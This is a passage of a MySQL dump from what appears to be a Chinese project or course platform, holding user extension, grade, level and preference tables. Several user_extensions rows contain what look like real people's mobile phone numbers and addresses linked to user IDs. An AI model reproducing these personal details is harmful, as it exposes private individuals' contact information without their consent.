10:42:44',NULL,NULL,NULL,NULL,NULL,'西安',NULL,'',NULL,'陕西'),(196,200,NULL,NULL,0,'上海交通大学',NULL,NULL,NULL,'2021-03-04 11:10:46','2021-03-04 11:11:20',NULL,NULL,NULL,NULL,NULL,'闵行',NULL,'',NULL,'上海'),(197,201,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-05 10:32:57','2021-03-05 10:32:57',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(198,202,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-05 11:23:45','2021-03-05 11:23:45',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(199,203,NULL,NULL,0,'黄岛区科教二路167号',NULL,NULL,NULL,'2021-03-05 13:12:22','2021-03-05 13:13:01',NULL,NULL,NULL,NULL,NULL,'青岛',NULL,'',NULL,'山东'),(200,204,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-05 14:19:55','2021-03-05 14:19:55',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(201,205,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-05 14:37:57','2021-03-05 14:37:57',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(202,206,NULL,NULL,0,'15850687079',NULL,NULL,NULL,'2021-03-05 22:04:34','2021-03-05 22:05:02',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(203,207,NULL,NULL,0,'清华大学',NULL,NULL,NULL,'2021-03-06 17:19:19','2021-03-06 17:19:41',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(204,208,NULL,NULL,0,'南京市江宁区东南大学路2号',NULL,NULL,NULL,'2021-03-06 17:26:16','2021-03-06 17:27:16',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(205,209,NULL,NULL,0,'徐州铜山区上海路101号江苏师范大学数学与统计学院',NULL,NULL,NULL,'2021-03-06 18:04:36','2021-03-06 18:05:26',NULL,NULL,NULL,NULL,NULL,'徐州',NULL,'',NULL,'江苏'),(206,210,NULL,NULL,0,'13817567047',NULL,NULL,NULL,'2021-03-06 19:56:38','2021-03-06 19:57:14',NULL,NULL,NULL,NULL,NULL,'闵行',NULL,'',NULL,'上海'),(207,211,NULL,NULL,0,'南方科技大学',NULL,NULL,NULL,'2021-03-07 23:20:59','2021-03-07 23:21:41',NULL,NULL,NULL,NULL,NULL,'深圳',NULL,'',NULL,'广东'),(208,212,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-09 16:01:16','2021-03-09 08:02:05',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'北京'),(209,213,NULL,NULL,1,'18284572692',NULL,NULL,NULL,'2021-03-09 16:20:16','2021-03-09 16:20:57',NULL,NULL,NULL,NULL,NULL,'成都',NULL,'',NULL,'四川'),(210,214,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-09 16:43:12','2021-03-09 08:45:06',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'湖南'),(211,215,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-09 21:49:19','2021-03-09 13:53:52',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'北京'),(212,216,NULL,NULL,0,'13716758829',NULL,NULL,NULL,'2021-03-10 18:03:19','2021-03-10 18:03:37',NULL,NULL,NULL,NULL,NULL,'昌平',NULL,'',NULL,'北京'),(213,217,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-11 07:02:07','2021-03-11 07:02:07',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(214,218,NULL,NULL,0,'学院路',NULL,NULL,NULL,'2021-03-11 15:05:29','2021-03-11 15:05:52',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(215,219,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-12 20:36:44','2021-03-14 05:32:19',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'江苏'),(216,220,NULL,NULL,0,'13051359791',NULL,NULL,NULL,'2021-03-13 11:50:02','2021-03-13 11:50:19',NULL,NULL,NULL,NULL,NULL,'朝阳',NULL,'',NULL,'北京'),(217,221,NULL,NULL,0,'18081230160',NULL,NULL,NULL,'2021-03-13 14:46:34','2021-03-13 14:47:16',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川');
|
||
/*!40000 ALTER TABLE `user_extensions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_feedback_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_feedback_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_feedback_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`journals_for_message_id` int(11) DEFAULT NULL,
|
||
`journals_for_message_type` varchar(255) DEFAULT NULL,
|
||
`viewed` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_feedback_messages_on_user_id_and_created_at` (`user_id`,`created_at`),
|
||
KEY `index_user_feedback_messages_on_journals_for_message_id` (`journals_for_message_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_feedback_messages`
|
||
--
|
||
|
||
LOCK TABLES `user_feedback_messages` WRITE;
|
||
/*!40000 ALTER TABLE `user_feedback_messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `user_feedback_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_grades`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_grades`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_grades` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`project_id` int(11) NOT NULL,
|
||
`grade` float DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_grades_on_grade` (`grade`),
|
||
KEY `index_user_grades_on_project_id` (`project_id`),
|
||
KEY `index_user_grades_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=173 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_grades`
|
||
--
|
||
|
||
LOCK TABLES `user_grades` WRITE;
|
||
/*!40000 ALTER TABLE `user_grades` DISABLE KEYS */;
|
||
INSERT INTO `user_grades` VALUES (1,1,1,0,'2018-07-06 18:01:47','2018-07-06 18:01:47'),(2,1,2,0,'2018-07-08 15:19:48','2018-07-08 15:19:48'),(3,1,3,12,'2018-07-18 16:50:44','2018-07-19 09:52:32'),(4,1,8,9,'2018-07-20 10:01:50','2018-08-03 17:07:26'),(5,5,13,17,'2018-07-20 10:17:47','2018-08-10 09:19:23'),(6,5,11,12,'2018-07-20 10:19:30','2018-07-20 10:21:01'),(7,5,12,29,'2018-07-20 10:21:31','2018-08-08 09:22:35'),(8,3,11,0,'2018-07-20 11:14:40','2018-07-20 11:14:40'),(9,6,18,8,'2018-07-20 14:50:29','2018-07-20 14:51:24'),(10,1,13,2,'2018-08-02 21:30:25','2018-08-10 09:19:06'),(11,1,18,13,'2018-08-03 16:40:00','2018-08-03 17:50:18'),(12,6,19,4,'2018-08-03 18:35:14','2018-08-03 18:35:14'),(13,1,20,4,'2018-08-03 18:50:40','2018-08-03 18:50:40'),(14,1,21,4,'2018-08-03 18:52:08','2018-08-03 18:52:08'),(15,1,31,0,'2018-08-21 22:01:46','2018-08-21 22:01:46'),(16,11,37,0,'2018-08-21 22:13:46','2018-08-21 22:13:46'),(17,1,32,4,'2018-11-14 14:54:47','2018-11-14 14:54:47'),(18,1,76,12,'2018-11-22 23:27:43','2018-11-23 00:37:57'),(19,19,81,4,'2019-01-15 15:08:31','2019-01-15 15:08:31'),(20,19,94,4,'2019-01-21 10:17:25','2019-01-21 10:17:25'),(21,1,95,22,'2019-01-21 15:39:03','2019-01-22 00:50:45'),(22,6,96,0,'2019-01-21 23:10:35','2019-01-21 23:10:35'),(23,6,97,0,'2019-01-21 23:21:47','2019-01-21 23:21:47'),(24,1,100,27,'2019-01-22 00:35:19','2019-01-22 00:57:05'),(25,6,100,0,'2019-01-22 00:40:07','2019-01-22 00:40:07'),(26,6,101,0,'2019-01-22 09:10:32','2019-01-22 09:10:32'),(27,1,101,10,'2019-01-22 09:14:03','2019-01-22 09:20:38'),(28,6,102,0,'2019-01-22 09:32:37','2019-01-22 09:32:37'),(29,6,103,0,'2019-01-22 09:32:38','2019-01-22 09:32:38'),(30,26,120,4,'2019-03-05 15:49:52','2019-03-05 15:49:52'),(31,42,130,0,'2019-04-17 09:55:48','2019-04-17 09:55:48'),(32,43,130,6,'2019-04-17 09:57:04','2019-04-17 17:36:14'),(33,26,130,38,'2019-04-17 13:19:30','2019-04-29 13:22:20'),(34,51,130,1,'2019-08-07 15:03:10','2019-08-07 15:03:10'),(35,46,128,4,'2019-08-08 08:48:02','2019-08-08 08:48:02'),(36,20,134,0,'2019-08-08 15:22:26','2019-08-08 15:22:26'),(37,49,134,4,'2019-08-08 15:34:53','2019-08-08 15:34:53'),(38,50,134,8,'2019-08-08 15:38:59','2019-09-02 10:04:20'),(39,46,130,1,'2019-08-13 17:14:00','2019-08-14 14:35:38'),(40,49,130,0,'2019-08-13 17:19:25','2019-08-13 17:19:25'),(41,53,133,0,'2019-08-14 08:11:33','2019-08-14 08:11:33'),(42,46,133,4,'2019-08-14 08:17:58','2019-08-14 08:17:58'),(43,50,141,10,'2019-08-16 09:24:33','2019-09-02 08:56:25'),(44,50,144,4,'2019-08-23 15:09:37','2019-08-23 15:09:37'),(45,52,152,0,'2019-09-19 16:09:51','2019-09-19 16:09:51'),(46,49,152,0,'2019-09-19 16:24:42','2019-09-19 16:24:42'),(47,20,155,4,'2019-10-08 10:43:48','2019-10-08 10:44:52'),(48,49,161,0,'2019-10-08 10:51:53','2019-10-08 10:51:53'),(49,20,161,11,'2019-10-08 11:00:58','2019-10-08 13:47:02'),(50,20,159,0,'2019-10-08 11:17:57','2019-10-08 11:17:57'),(51,49,163,0,'2019-10-14 08:53:43','2019-10-14 08:53:43'),(52,46,163,0,'2019-10-14 09:01:10','2019-10-14 09:01:10'),(53,46,164,0,'2019-10-18 11:28:39','2019-10-18 11:28:39'),(54,20,165,0,'2019-10-18 17:19:10','2019-10-18 17:19:10'),(55,50,166,0,'2019-10-19 09:19:04','2019-10-19 09:19:04'),(56,49,167,0,'2019-10-23 09:12:06','2019-10-23 09:12:06'),(57,49,168,0,'2019-10-23 09:38:24','2019-10-23 09:38:24'),(58,46,169,7,'2019-10-23 16:14:16','2019-10-23 16:54:49'),(59,49,169,5,'2019-10-23 16:37:05','2019-10-23 16:54:36'),(60,41,171,0,'2019-10-28 15:09:35','2019-10-28 15:09:35'),(61,41,127,0,'2019-10-28 15:11:19','2019-10-28 15:11:19'),(62,46,173,0,'2019-10-29 09:02:32','2019-10-29 09:02:32'),(63,46,176,0,'2019-10-29 15:15:04','2019-10-29 15:15:04'),(64,46,178,0,'2019-10-29 16:29:30','2019-10-29 16:29:30'),(65,61,186,0,'2019-10-29 17:58:31','2019-10-29 17:58:31'),(66,46,187,0,'2019-10-31 14:52:25','2019-10-31 14:52:25'),(67,46,188,15,'2019-10-31 15:11:08','2019-10-31 17:05:24'),(70,61,188,12,'2019-10-31 15:17:12','2019-10-31 17:05:53'),(71,59,189,0,'2019-10-31 15:18:45','2019-10-31 15:18:45'),(72,59,188,1,'2019-10-31 17:04:05','2019-10-31 17:04:31'),(73,46,189,0,'2019-11-04 16:18:26','2019-11-04 16:18:26'),(74,64,192,0,'2019-11-06 16:00:22','2019-11-06 16:00:22'),(75,65,192,0,'2019-11-06 16:00:35','2019-11-06 16:00:35'),(76,66,192,0,'2019-11-06 16:03:13','2019-11-06 16:03:13'),(77,63,192,0,'2019-11-06 16:16:44','2019-11-06 16:16:44'),(78,46,192,4,'2019-11-06 16:30:15','2019-11-06 16:38:25'),(79,59,193,0,'2019-11-06 16:36:58','2019-11-06 16:36:58'),(80,49,192,1,'2019-11-06 16:39:06','2019-11-06 16:39:06'),(81,59,196,0,'2019-11-07 11:10:08','2019-11-07 11:10:08'),(82,46,194,4,'2019-11-07 11:13:30','2019-11-07 11:15:06'),(83,49,194,8,'2019-11-07 11:14:16','2019-11-07 11:14:16'),(84,65,194,0,'2019-11-07 11:15:59','2019-11-07 11:15:59'),(85,59,199,0,'2019-11-07 15:53:33','2019-11-07 15:53:33'),(86,46,199,53,'2019-11-07 15:53:58','2019-11-22 10:30:35'),(87,59,200,0,'2019-11-07 16:17:51','2019-11-07 16:17:51'),(88,64,199,62,'2019-11-07 16:20:28','2019-11-22 10:01:49'),(89,71,199,1,'2019-11-08 09:11:56','2019-11-08 09:11:56'),(90,65,199,39,'2019-11-08 10:52:01','2019-11-22 09:29:45'),(92,49,199,16,'2019-11-08 11:13:50','2019-11-08 14:49:24'),(93,65,201,0,'2019-11-08 18:43:13','2019-11-08 18:43:13'),(95,46,203,0,'2019-11-11 09:02:38','2019-11-11 09:02:38'),(96,48,203,0,'2019-11-11 09:11:06','2019-11-11 09:11:06'),(97,66,203,0,'2019-11-11 09:12:57','2019-11-11 09:12:57'),(98,46,206,0,'2019-11-11 09:44:57','2019-11-11 09:44:57'),(99,46,207,0,'2019-11-11 09:49:06','2019-11-11 09:49:06'),(100,46,208,4,'2019-11-11 09:51:22','2019-11-11 09:59:56'),(101,59,209,0,'2019-11-11 09:55:49','2019-11-11 09:55:49'),(102,49,208,1,'2019-11-11 10:00:12','2019-11-11 10:00:12'),(103,59,212,0,'2019-11-11 10:11:19','2019-11-11 10:11:19'),(104,46,212,0,'2019-11-11 10:11:34','2019-11-11 10:11:34'),(105,59,213,0,'2019-11-11 10:13:20','2019-11-11 10:13:20'),(106,64,222,0,'2019-11-11 11:00:48','2019-11-11 11:00:48'),(107,66,222,0,'2019-11-11 11:02:28','2019-11-11 11:02:28'),(108,48,199,0,'2019-11-11 11:08:00','2019-11-11 11:08:00'),(109,64,224,0,'2019-11-11 11:38:58','2019-11-11 11:38:58'),(110,49,225,0,'2019-11-11 11:44:39','2019-11-11 11:44:39'),(111,50,226,0,'2019-11-11 12:34:37','2019-11-11 12:34:37'),(112,64,227,0,'2019-11-11 15:07:46','2019-11-11 15:07:46'),(113,59,228,0,'2019-11-11 15:36:02','2019-11-11 15:36:02'),(114,49,229,0,'2019-11-11 15:36:46','2019-11-11 15:36:46'),(115,49,230,0,'2019-11-11 15:37:23','2019-11-11 15:37:23'),(116,64,231,0,'2019-11-11 15:37:29','2019-11-11 15:37:29'),(117,64,232,4,'2019-11-11 17:08:54','2019-11-11 17:13:17'),(118,59,233,0,'2019-11-11 17:12:09','2019-11-11 17:12:09'),(119,49,232,1,'2019-11-11 17:13:34','2019-11-11 17:13:34'),(120,59,234,0,'2019-11-12 09:00:03','2019-11-12 09:00:03'),(121,49,234,4,'2019-11-12 09:05:56','2019-11-12 09:05:56'),(122,49,235,4,'2019-11-12 09:18:38','2019-11-12 09:18:38'),(123,59,236,0,'2019-11-12 10:08:55','2019-11-12 10:08:55'),(124,49,237,4,'2019-11-12 10:16:03','2019-11-12 10:16:03'),(125,59,237,0,'2019-11-13 14:37:22','2019-11-13 14:37:22'),(126,64,237,0,'2019-11-13 14:47:12','2019-11-13 14:47:12'),(127,64,239,0,'2019-11-20 18:47:53','2019-11-20 18:47:53'),(128,46,246,0,'2019-11-22 15:33:44','2019-11-22 15:33:44'),(129,65,247,0,'2019-11-22 15:38:06','2019-11-22 15:38:06'),(130,65,248,0,'2019-11-22 15:41:18','2019-11-22 15:41:18'),(131,50,250,0,'2019-12-04 08:21:58','2019-12-04 08:21:58'),(132,76,251,4,'2020-02-01 20:36:53','2020-02-04 22:00:33'),(133,76,252,0,'2020-02-01 21:18:26','2020-02-01 21:18:26'),(134,75,253,0,'2020-02-01 22:24:23','2020-02-01 22:24:23'),(135,78,256,0,'2020-02-03 17:44:53','2020-02-03 17:44:53'),(136,79,251,0,'2020-02-04 22:06:21','2020-02-04 22:06:21'),(137,80,251,0,'2020-02-04 22:15:09','2020-02-04 22:15:09'),(138,76,255,0,'2020-02-05 11:17:13','2020-02-05 11:17:13'),(139,82,255,0,'2020-02-10 10:14:29','2020-02-10 10:14:29'),(140,86,255,1,'2020-02-10 10:14:42','2020-02-11 10:42:16'),(141,85,255,0,'2020-02-10 10:14:57','2020-02-10 10:14:57'),(142,87,255,0,'2020-02-10 10:15:07','2020-02-10 10:15:07'),(143,81,255,84,'2020-02-10 10:15:35','2020-03-19 14:13:32'),(144,88,255,0,'2020-02-10 10:16:14','2020-02-10 10:16:14'),(145,90,255,0,'2020-02-10 10:16:23','2020-02-10 10:16:23'),(146,91,255,0,'2020-02-10 10:16:40','2020-02-10 10:16:40'),(147,95,255,0,'2020-02-10 10:16:47','2020-02-10 10:16:47'),(148,96,255,0,'2020-02-10 10:16:56','2020-02-10 10:16:56'),(149,97,255,0,'2020-02-10 10:17:38','2020-02-10 10:17:38'),(150,98,255,1,'2020-02-10 10:17:47','2020-02-11 21:01:22'),(151,99,255,16,'2020-02-10 10:17:55','2020-02-11 17:02:48'),(152,75,255,0,'2020-02-10 10:18:04','2020-02-10 10:18:04'),(153,84,255,0,'2020-02-10 10:20:11','2020-02-10 10:20:11'),(154,89,255,2,'2020-02-10 10:20:19','2020-02-11 11:31:22'),(155,93,255,0,'2020-02-10 10:20:29','2020-02-10 10:20:29'),(156,80,255,0,'2020-02-10 10:20:38','2020-02-10 10:20:38'),(157,94,255,0,'2020-02-10 10:20:47','2020-02-10 10:20:47'),(158,100,255,0,'2020-02-10 10:20:56','2020-02-10 10:20:56'),(159,102,255,0,'2020-02-10 10:21:04','2020-02-10 10:21:04'),(160,92,255,0,'2020-02-10 10:22:04','2020-02-10 10:22:04'),(161,83,255,16,'2020-02-10 10:26:53','2020-02-11 20:08:12'),(162,47,269,0,'2020-02-11 09:46:46','2020-02-11 09:46:46'),(163,77,255,1,'2020-02-11 11:33:33','2020-02-11 11:33:33'),(164,101,255,0,'2020-02-11 16:43:58','2020-02-11 16:43:58'),(165,80,272,0,'2020-03-09 10:22:41','2020-03-09 10:22:41'),(166,104,255,0,'2020-03-19 14:01:17','2020-03-19 14:01:17'),(167,107,255,0,'2020-03-19 15:13:11','2020-03-19 15:13:11'),(168,106,255,0,'2020-03-19 15:15:15','2020-03-19 15:15:15'),(169,109,255,0,'2020-03-19 15:15:17','2020-03-19 15:15:17'),(170,108,255,0,'2020-03-19 15:17:18','2020-03-19 15:17:18'),(171,105,255,0,'2020-03-19 15:23:57','2020-03-19 15:23:57'),(172,63,266,0,'2020-03-19 15:51:49','2020-03-19 15:51:49');
|
||
/*!40000 ALTER TABLE `user_grades` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_hidden_modules`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_hidden_modules`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_hidden_modules` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`module_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_hidden_modules_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_hidden_modules`
|
||
--
|
||
|
||
LOCK TABLES `user_hidden_modules` WRITE;
|
||
/*!40000 ALTER TABLE `user_hidden_modules` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `user_hidden_modules` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_levels`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_levels`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_levels` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`level` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=66 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_levels`
|
||
--
|
||
|
||
LOCK TABLES `user_levels` WRITE;
|
||
/*!40000 ALTER TABLE `user_levels` DISABLE KEYS */;
|
||
INSERT INTO `user_levels` VALUES (1,1,3),(2,4,1),(3,5,1),(4,3,1),(5,6,3),(6,11,3),(7,19,1),(8,26,1),(9,42,1),(10,43,3),(11,51,1),(12,46,3),(13,49,3),(14,20,3),(15,50,3),(16,53,3),(17,52,3),(18,41,3),(19,61,3),(21,64,3),(22,65,3),(23,66,3),(24,63,1),(25,71,1),(26,48,3),(27,76,3),(28,75,3),(29,78,3),(30,79,3),(31,80,3),(32,82,3),(33,86,3),(34,85,3),(35,87,3),(36,81,3),(37,88,3),(38,90,1),(39,91,3),(40,95,3),(41,96,3),(42,97,3),(43,98,3),(44,99,3),(45,84,3),(46,89,3),(47,93,3),(48,94,3),(49,100,3),(50,102,3),(51,92,3),(52,83,3),(53,47,3),(54,77,1),(55,101,3),(56,104,1),(57,107,1),(58,106,1),(59,109,1),(60,108,1),(61,105,3),(62,111,1),(63,73,1),(64,112,1),(65,127,1);
|
||
/*!40000 ALTER TABLE `user_levels` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_preferences`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_preferences`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_preferences` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL DEFAULT '0',
|
||
`others` text,
|
||
`hide_mail` tinyint(1) DEFAULT '0',
|
||
`time_zone` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_preferences_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=121 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_preferences`
|
||
--
|
||
|
||
LOCK TABLES `user_preferences` WRITE;
|
||
/*!40000 ALTER TABLE `user_preferences` DISABLE KEYS */;
|
||
INSERT INTO `user_preferences` VALUES (1,1,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 5\n',0,NULL),(2,3,'---\n:no_self_notified: false\n',0,NULL),(3,4,'---\n:no_self_notified: false\n',0,NULL),(4,5,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(5,6,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(6,7,'---\n:no_self_notified: false\n',0,NULL),(7,8,'---\n:no_self_notified: false\n',0,NULL),(8,9,'---\n:no_self_notified: false\n',0,NULL),(9,10,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(10,11,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(11,12,'---\n:no_self_notified: false\n',0,NULL),(12,13,'---\n:no_self_notified: false\n',0,NULL),(13,14,'---\n:no_self_notified: false\n',0,NULL),(14,15,'---\n:no_self_notified: false\n',0,NULL),(15,16,'---\n:no_self_notified: false\n',0,NULL),(16,17,'---\n:no_self_notified: false\n',0,NULL),(17,18,'--- {}\n',0,NULL),(18,19,'---\n:no_self_notified: false\n',0,NULL),(19,20,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(20,21,'---\n:no_self_notified: false\n',0,NULL),(21,22,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(22,23,'---\n:no_self_notified: false\n',0,NULL),(23,24,'---\n:no_self_notified: false\n',0,NULL),(24,25,'---\n:no_self_notified: false\n',0,NULL),(25,26,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(26,27,'---\n:no_self_notified: false\n',0,NULL),(27,28,'---\n:no_self_notified: false\n',0,NULL),(28,29,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(29,30,'---\n:no_self_notified: false\n',0,NULL),(30,31,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(31,32,'---\n:no_self_notified: false\n',0,NULL),(32,33,'---\n:no_self_notified: false\n',0,NULL),(33,34,'---\n:no_self_notified: false\n',0,NULL),(34,35,'---\n:no_self_notified: false\n',0,NULL),(35,36,'---\n:no_self_notified: false\n',0,NULL),(36,37,'---\n:no_self_notified: false\n',0,NULL),(37,38,'---\n:no_self_notified: false\n',0,NULL),(38,39,'---\n:no_self_notified: false\n',0,NULL),(39,40,'---\n:no_self_notified: false\n',0,NULL),(40,41,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 12\n',0,NULL),(41,42,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(42,43,'---\n:no_self_notified: false\n',0,NULL),(43,44,'---\n:no_self_notified: false\n',0,NULL),(44,45,'---\n:no_self_notified: false\n',0,NULL),(45,46,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(46,47,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(47,48,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(48,49,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(49,50,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 4\n',0,NULL),(50,51,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(51,52,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(52,53,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(53,54,'---\n:no_self_notified: false\n',0,NULL),(54,55,'---\n:no_self_notified: false\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(55,56,'---\n:no_self_notified: false\n',0,NULL),(56,57,'--- {}\n',0,NULL),(57,58,'--- {}\n',0,NULL),(59,60,'--- {}\n',0,NULL),(60,61,'--- {}\n',0,NULL),(61,62,'--- {}\n',0,NULL),(62,63,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(63,64,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(64,65,'---\n:gantt_zoom: 2\n:gantt_months: 3\n',0,NULL),(65,66,'--- {}\n',0,NULL),(66,71,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(67,69,'--- {}\n',0,NULL),(69,73,'--- {}\n',0,NULL),(70,75,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(71,77,'--- {}\n',0,NULL),(72,76,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(73,78,'--- {}\n',0,NULL),(74,79,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(75,80,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(76,82,'--- {}\n',0,NULL),(77,81,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(78,92,'--- {}\n',0,NULL),(79,95,'--- {}\n',0,NULL),(80,100,'--- {}\n',0,NULL),(81,103,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(82,83,'--- {}\n',0,NULL),(83,98,'--- {}\n',0,NULL),(84,91,'--- {}\n',0,NULL),(85,86,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(86,89,'--- {}\n',0,NULL),(87,99,'--- {}\n',0,NULL),(88,90,'--- {}\n',0,NULL),(89,97,'--- {}\n',0,NULL),(90,96,'--- {}\n',0,NULL),(91,94,'--- {}\n',0,NULL),(92,104,'--- {}\n',0,NULL),(93,105,'--- {}\n',0,NULL),(94,107,'--- {}\n',0,NULL),(95,106,'--- {}\n',0,NULL),(96,109,'---\n:gantt_zoom: 2\n:gantt_months: 6\n',0,NULL),(97,108,'--- {}\n',0,NULL),(98,110,'--- {}\n',0,NULL),(99,111,'--- {}\n',0,NULL),(100,112,'--- {}\n',0,NULL),(101,114,'--- {}\n',0,NULL),(102,115,'--- {}\n',0,NULL),(103,118,'--- {}\n',0,NULL),(104,121,'--- {}\n',0,NULL),(105,119,'--- 